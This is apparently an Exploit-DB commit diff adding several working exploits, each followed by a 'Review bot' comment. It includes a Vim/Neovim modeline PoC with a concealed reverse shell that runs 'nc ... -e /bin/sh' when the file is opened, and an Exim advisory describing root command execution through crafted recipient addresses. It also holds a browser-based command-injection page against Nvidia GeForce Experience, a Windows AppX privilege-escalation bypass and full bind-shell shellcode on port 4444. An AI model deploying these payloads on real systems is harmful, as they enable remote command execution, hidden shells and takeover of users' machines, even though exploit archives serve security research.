DB: 2019-06-08

5 changes to exploits/shellcodes

Nvidia GeForce Experience Web Helper - Command Injection
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)

Exim 4.87 < 4.91 - (Local / Remote) Command Execution

Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
Offensive Security 2019-06-08 05:01:56 +00:00
parent 35d500a3cb
commit 85fbab2de4
7 changed files with 557 additions and 0 deletions


@ -0,0 +1,142 @@
*by Arminius ([@rawsec](https://twitter.com/rawsec))*
Vim/Neovim Arbitrary Code Execution via Modelines
=================================================
```
Product: Vim < 8.1.1365, Neovim < 0.3.6
Type: Arbitrary Code Execution
CVE: CVE-2019-12735
Date: 2019-06-04
Author: Arminius (@rawsec)
```
Summary
-------
Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code
execution via modelines by opening a specially crafted text file.
Proof of concept
----------------
- Create [`poc.txt`](../data/2019-06-04_ace-vim-neovim/poc.txt):
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
- Ensure that the modeline option has not been disabled (`:set modeline`).
- Open the file in Vim:
$ vim poc.txt
- The system will execute `uname -a`.
Proof of concept 2 (reverse shell)
----------------------------------
This PoC outlines a real-life attack approach in which a reverse shell
is launched once the user opens the file. To conceal the attack, the file will
be immediately rewritten when opened. Also, the PoC uses terminal escape
sequences to hide the modeline when the content is printed with `cat`. (`cat
-v` reveals the actual content.)
[`shell.txt`](../data/2019-06-04_ace-vim-neovim/shell.txt):
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
Demo (victim left, attacker right):
![Reverse shell demo](https://i.imgur.com/8w4tteX.gif)
Details
-------
The modeline feature allows to specify custom editor options near the start or
end of a file. This feature is enabled by default and applied to all file types,
including plain `.txt`. A typical modeline:
/* vim: set textwidth=80 tabstop=8: */
For security reasons, only a subset of options is permitted in modelines, and
if the option value contains an expression, it is executed in a sandbox: [[1]]
No other commands than "set" are supported, for security reasons (somebody
might create a Trojan horse text file with modelines). And not all options
can be set. For some options a flag is set, so that when it's used the
|sandbox| is effective.
The sandbox is meant to prevent side effects: [[2]]
The 'foldexpr', 'formatexpr', 'includeexpr', 'indentexpr', 'statusline' and
'foldtext' options may be evaluated in a sandbox. This means that you are
protected from these expressions having nasty side effects. This gives some
safety for when these options are set from a modeline.
However, the `:source!` command (with the bang [`!`] modifier) can be used to
bypass the sandbox. It reads and executes commands from a given file as if
*typed manually*, running them after the sandbox has been left. [[3]]
:so[urce]! {file} Read Vim commands from {file}. These are commands
that are executed from Normal mode, like you type
them.
Thus, one can trivially construct a modeline that runs code outside the sandbox:
# vim: set foldexpr=execute('\:source! some_file'):
An additional step is needed for Neovim which blacklists `execute()`: [[4]]
execute({command} [, {silent}]) *execute()*
Execute {command} and capture its output.
[...]
This function is not available in the |sandbox|.
Here, `assert_fails()` can be used instead, which takes a `{cmd}` argument, too: [[5]]
assert_fails({cmd} [, {error} [, {msg}]]) *assert_fails()*
Run {cmd} and add an error message to |v:errors| if it does
NOT produce an error.
The following modeline utilizes a fold expression to run `source! %` to
execute the current file, which in turn executes `uname -a || "(garbage)"` as a
shell command:
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
Additionally, the Neovim-only function `nvim_input()` is vulnerable to the same
approach via e.g.:
vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0
(In the past, other modeline-related vulnerabilities have been patched in Vim - see [CVE-2002-1377](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1377), [CVE-2016-1248](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248).)
Patches
-------
- [Vim patch 8.1.1365](https://github.com/vim/vim/commit/5357552)
- [Neovim patch](https://github.com/neovim/neovim/pull/10082) (released in [v0.3.6](https://github.com/neovim/neovim/releases/tag/v0.3.6))
Beyond patching, it's recommended to disable modelines in the vimrc (`set
nomodeline`), to use the [securemodelines](https://github.com/ciaranm/securemodelines/)
plugin, or to disable `modelineexpr` (since patch 8.1.1366, Vim-only) to disallow
expressions in modelines.
Timeline
--------
- 2019-05-22 Vim and Neovim maintainers notified
- 2019-05-23 Vim patch released
- 2019-05-29 Neovim patch released
- 2019-06-05 CVE ID CVE-2019-12735 assigned
Also see description of [CVE-2019-12735](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735).
[1]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/options.txt#L582
[2]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/eval.txt#L13050
[3]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/repeat.txt#L182
[4]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L3247
[5]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L2494
[6]: https://github.com/vim/vim/releases/tag/v8.1.1365
[7]: https://github.com/neovim/neovim/releases/tag/v0.3.6
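Review bot: the PoC and example modelines in this file (the `:!uname -a||" vi:fen:...` line under "Create poc.txt", the `$ vim poc.txt` command, and the modelines under Details) are bare markdown text while the header block is fenced; a markdown renderer will consume the `\!`, `\ ` and `\%` escapes and treat `*` as emphasis, so anyone copying from the rendered page gets a corrupted modeline. Put each of them in a fenced block like the header. Also, the reference definitions `[6]` and `[7]` are never cited in the body; either link the two Patches entries to them or drop them.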


@ -0,0 +1,157 @@
Qualys Security Advisory
The Return of the WIZard: RCE in Exim (CVE-2019-10149)
========================================================================
Contents
========================================================================
Summary
Local exploitation
Remote exploitation
- Non-default configurations
- Default configuration
Acknowledgments
Timeline
Boromir: "What is this new devilry?"
Gandalf: "A Balrog. A demon of the Ancient World."
-- The Lord of the Rings: The Fellowship of the Ring
========================================================================
Summary
========================================================================
During a code review of the latest changes in the Exim mail server
(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability
in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means
Remote *Command* Execution, not Remote Code Execution: an attacker can
execute arbitrary commands with execv(), as root; no memory corruption
or ROP (Return-Oriented Programming) is involved.
This vulnerability is exploitable instantly by a local attacker (and by
a remote attacker in certain non-default configurations). To remotely
exploit this vulnerability in the default configuration, an attacker
must keep a connection to the vulnerable server open for 7 days (by
transmitting one byte every few minutes). However, because of the
extreme complexity of Exim's code, we cannot guarantee that this
exploitation method is unique; faster methods may exist.
Exim is vulnerable by default since version 4.87 (released on April 6,
2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and
older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled
manually. Surprisingly, this vulnerability was fixed in version 4.92
(released on February 10, 2019):
https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...
https://bugs.exim.org/show_bug.cgi?id=2310
but was not identified as a security vulnerability, and most operating
systems are therefore affected. For example, we exploit an up-to-date
Debian distribution (9.9) in this advisory.
========================================================================
Local exploitation
========================================================================
The vulnerable code is located in deliver_message():
6122 #ifndef DISABLE_EVENT
6123 if (process_recipients != RECIP_ACCEPT)
6124 {
6125 uschar * save_local = deliver_localpart;
6126 const uschar * save_domain = deliver_domain;
6127
6128 deliver_localpart = expand_string(
6129 string_sprintf("${local_part:%s}", new->address));
6130 deliver_domain = expand_string(
6131 string_sprintf("${domain:%s}", new->address));
6132
6133 (void) event_raise(event_action,
6134 US"msg:fail:internal", new->message);
6135
6136 deliver_localpart = save_local;
6137 deliver_domain = save_domain;
6138 }
6139 #endif
Because expand_string() recognizes the "${run{<command> <args>}}"
expansion item, and because new->address is the recipient of the mail
that is being delivered, a local attacker can simply send a mail to
"${run{...}}@localhost" (where "localhost" is one of Exim's
local_domains) and execute arbitrary commands, as root
(deliver_drop_privilege is false, by default):
[...]
========================================================================
Remote exploitation
========================================================================
Our local-exploitation method does not work remotely, because the
"verify = recipient" ACL (Access-Control List) in Exim's default
configuration requires the local part of the recipient's address (the
part that precedes the @ sign) to be the name of a local user:
[...]
------------------------------------------------------------------------
Non-default configurations
------------------------------------------------------------------------
We eventually devised an elaborate method for exploiting Exim remotely
in its default configuration, but we first identified various
non-default configurations that are easy to exploit remotely:
- If the "verify = recipient" ACL was removed manually by an
administrator (maybe to prevent username enumeration via RCPT TO),
then our local-exploitation method also works remotely.
- If Exim was configured to recognize tags in the local part of the
recipient's address (via "local_part_suffix = +* : -*" for example),
then a remote attacker can simply reuse our local-exploitation method
with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the
name of a local user).
- If Exim was configured to relay mail to a remote domain, as a
secondary MX (Mail eXchange), then a remote attacker can simply reuse
our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum"
(where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the
"verify = recipient" ACL can only check the domain part of a remote
address (the part that follows the @ sign), not the local part.
------------------------------------------------------------------------
Default configuration
------------------------------------------------------------------------
[...]
========================================================================
Acknowledgments
========================================================================
We thank Exim's developers, Solar Designer, and the members of
distros@openwall.
"The Return of the WIZard" is a reference to Sendmail's ancient WIZ and
DEBUG vulnerabilities:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145
https://seclists.org/bugtraq/1995/Feb/56
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095
http://www.cheswick.com/ches/papers/berferd.pdf
========================================================================
Timeline
========================================================================
2019-05-27: Advisory sent to security@exim.
2019-05-28: Advisory sent to distros@openwall.
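Review bot: the fix-commit link under Summary is cut off with "..." (`https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...`), so it cannot be followed; restore the full URL or keep only the bugs.exim.org link, which is complete. The `[...]` markers under Local exploitation, Remote exploitation and Default configuration show this copy is abridged; a pointer to the full Qualys advisory would let readers see the `verify = recipient`, `local_part_suffix` and `relay_to_domains` details the text refers to when checking their own configuration.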


@ -0,0 +1,66 @@
<!--
POC for CVE20195678 Nvidia GeForce Experience OS command injection via a web browser
Author: David Yesland -- Rhino Security Labs
-->
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</head>
<body>
<script>
//Send request to local GFE server
function submitRequest(port,secret)
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text\/html");
xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret);
var body = "\""+document.getElementById("cmd").value+"\"";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
$(document).on('change', '.file-upload-button', function(event) {
var reader = new FileReader();
reader.onload = function(event) {
var jsonObj = JSON.parse(event.target.result);
submitRequest(jsonObj.port,jsonObj.secret);
}
reader.readAsText(event.target.files[0]);
});
//Copy text from some text field
function myFunction() {
var copyText = document.getElementById("myInput");
copyText.select();
document.execCommand("copy");
}
//trigger the copy and file window on ctrl press
$(document).keydown(function(keyPressed) {
if (keyPressed.keyCode == 17) {
myFunction();document.getElementById('file-input').click();
}
});
</script>
<h2>
Press CTRL+V+Enter
</h2>
<!--Command to run in a hidden input field-->
<input type="hidden" value="calc.exe" id="cmd" size="55">
<!--Hidden text box to copy text from-->
<div style="opacity: 0.0;">
<input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json"
id="myInput" size="1">
</div>
<!--file input-->
<input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" />
</body>
</html>
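Review bot: the file input's inline handler `onchange="file_changed(this)"` references a function that is defined nowhere in the page; the actual work is done by the jQuery `.file-upload-button` change handler, so the inline attribute only raises a ReferenceError in the console and should be removed. The identifier in the header comment is written `CVE20195678` without separators; use the standard hyphenated CVE-YYYY-NNNN form so it is searchable. Pulling jQuery from the Google CDN also makes a purely localhost PoC depend on Internet access; a plain `addEventListener` on the input and on `keydown` would remove that dependency.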


@ -0,0 +1,34 @@
CVE-2019-0841 BYPASS #2
There is a second bypass for CVE-2019-0841.
This can be triggered as following:
Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (atleast the ones we can delete as user)
Try to launch edge. It will crash the first time.
When we launch it a second time, it will write the DACL while impersonating "SYSTEM".
The trick here is to launch edge by clicking it on the taskbar or desktop, using "start microsoft-edge:" seems to result in correct impersonation.
You can still do this completely programmatically.. since edge will always be in the same position in the task bar.. *cough* sendinput *cough*. There is probably other ways too.
Another note, this bug is most definitely not restricted to edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a poc, took me like 2 hours total, finding LPEs is easy.
To repro:
1. Launch my poc
2. Launch edge several times
Use video demo as guidance. Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Make sure you have multiple cores in your VM (not multiple processors, multiple cores).
It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your vm to have multiple processors instead of multiple cores... which will also cause it to lock up.
EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46976.zip
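Review bot: the write-up names no tested Windows build or patch level, and the repro steps refer to "my poc", which exists only in the external zip at the EDB link; stating the build the race was confirmed on and what the PoC binary does to the package folder would let readers judge whether a given host is affected. The core-count and thread-priority requirement is the first thing a reader needs, so it belongs with the "To repro" steps rather than after them.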


@ -10539,6 +10539,9 @@ id,file,description,date,author,type,platform,port
46938,exploits/windows/local/46938.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)",2019-05-23,SandboxEscaper,local,windows,
46945,exploits/windows/local/46945.cpp,"Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)",2014-11-24,anonymous,local,windows,
46962,exploits/windows/local/46962.py,"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)",2019-06-04,"Kevin Randall",local,windows,
46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows,
46973,exploits/linux/local/46973.md,"Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution",2019-06-04,Arminius,local,linux,
46976,exploits/windows/local/46976.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)",2019-06-07,SandboxEscaper,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
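Review bot: the 46972 row credits only "Rhino Security Labs" while the HTML file's header comment names David Yesland as the author; the other rows in this hunk credit individuals (SandboxEscaper, Kevin Randall), so the author column should follow the file.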
@ -17483,6 +17486,7 @@ id,file,description,date,author,type,platform,port
46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware,
46969,exploits/windows/remote/46969.rb,"IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)",2019-06-05,Metasploit,remote,windows,
46970,exploits/linux/remote/46970.rb,"LibreNMS - addhost Command Injection (Metasploit)",2019-06-05,Metasploit,remote,linux,
46974,exploits/linux/remote/46974.txt,"Exim 4.87 < 4.91 - (Local / Remote) Command Execution",2019-06-05,"Qualys Corporation",remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
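Review bot: the 46974 description "Exim 4.87 < 4.91" reads as an exclusive upper bound, but the advisory states versions 4.87 to 4.91 inclusive with 4.92 as the fixed release; write the range as "4.87 - 4.91" or "< 4.92" so the affected versions match the advisory.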



@ -967,3 +967,4 @@ id,file,description,date,author,type,platform
46829,shellcodes/linux_x86/46829.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64
46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64
46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64



@ -0,0 +1,153 @@
;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length: 131 bytes
;github = https://github.com/STARRBOY
;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"
================== ASSEMBLY ========================================
global _start
section .text
_start:
xor rsi, rsi ;set rsi to zero, since we will push syscall and first param on the stack and then pop it of we don't need to
;set rax and rdi to zero
create_socket:
;int socket(int domain, int type, int protocol);
push 41 ;sys_socket
pop rax
push 2
pop rdi
inc rsi ;SOCK_STREAM
xor rdx, rdx
syscall
;save the return value for future use
xchg rdi, rax
; sin_zero: 0
; sin_addr.s_addr: INADDR_ANY = 0
; sin_port: 4444
; sin_family: AF_INET = 2
xor rax, rax
push rax ; sin_zero
push rax ; zero out another 8 bytes for remaining members
mov word [rsp+2], 0x5c11 ; sin_port = 4444
mov byte [rsp], 0x2 ; sin_family
bind:
;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
xor rdx, rdx
push 49
pop rax
push rsp
pop rsi ;sockaddr stack pointer
add rdx, 16 ;sizeof sockaddr
syscall
listen:
;int listen(int sockfd, int backlog);
xor rsi, rsi
push 50 ;sys_listen
pop rax
inc rsi ;backlog = number of clients
syscall
accept:
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
push 43 ;sys_accept
pop rax
mov rsi, rsp ; stack pointer for client sockaddr
mov byte [rsp-1], 0x10 ; put size of the structure on the stack
dec rsp ; adjust stack pointer for previous
mov rdx, rsp ; stack pointer for struct size
syscall
;save client socket
xchg r10, rax
close:
;int close(int fd);
push 3 ;sys_close
pop rax
push rax ;save 3 on the stack for rsi in dup2
syscall
xchg rdi, r10 ;client socket as first parameter for dup2
pop rsi
dup2loop:
;int dup2(int oldfd, int newfd);
push 33 ;sys_dup2
pop rax
dec rsi
syscall
loopnz dup2loop
spawn_shell:
;int execve(const char *filename, char *const argv[], char *const envp[]);
xor eax, eax
add al, 59 ;sys_execve
xor rdi, rdi ;set rdi to zero
push rdi ;push null on the stack
mov rdi, 0x68732F2f6e69622F ;bin//sh in reverse
push rdi
mov rdi, rsp ;set stack pointer to rdi
xor rsi, rsi ;rsi and rdx == 0
xor rdx, rdx
syscall
=======Generate Shellcode==========================================
nasm -felf64 tcp_bind.nasm -o tcp_bind.o
ld tcp_bind.o -o tcp_bind
=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack bind.c -o bind
======================C program=====================================
#include <stdio.h>
#include <string.h>
unsigned char shellcode[]=\
"\x48\x31\xf6\x6a\x29\x58\x6a\x02\x5f\x48\xff\xc6\x48"
"\x31\xd2\x0f\x05\x48\x97\x48\x31\xc0\x50\x50\x66\xc7"
"\x44\x24\x02\x11\x5c\xc6\x04\x24\x02\x48\x31\xd2\x6a"
"\x31\x58\x54\x5e\x48\x83\xc2\x10\x0f\x05\x48\x31\xf6"
"\x6a\x32\x58\x48\xff\xc6\x0f\x05\x6a\x2b\x58\x48\x89"
"\xe6\xc6\x44\x24\xff\x10\x48\xff\xcc\x48\x89\xe2\x0f"
"\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87\xfa\x5e"
"\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x31\xc0\x04"
"\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05";
int main(){
printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}
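Review bot: in the C harness, `strlen(shellcode)` only reports the right length because this payload happens to contain no 0x00 byte; `sizeof(shellcode) - 1` gives the true length regardless and would flag a NUL introduced by a later edit. The harness also jumps into a global array in .data and relies on `-z execstack` making data pages executable, which is toolchain- and kernel-dependent; copying the bytes into an `mmap` region with `PROT_EXEC` is the portable way to test. In the assembly, the comment on the first `xor rsi, rsi` runs onto the next line (`;set rax and rdi to zero`), where it reads as a separate instruction comment, and `mov byte [rsp-1], 0x10` followed by `dec rsp` leaves rsp misaligned for the rest of the code; it works because nothing afterwards needs alignment, but a comment saying so would save the next reader a puzzle.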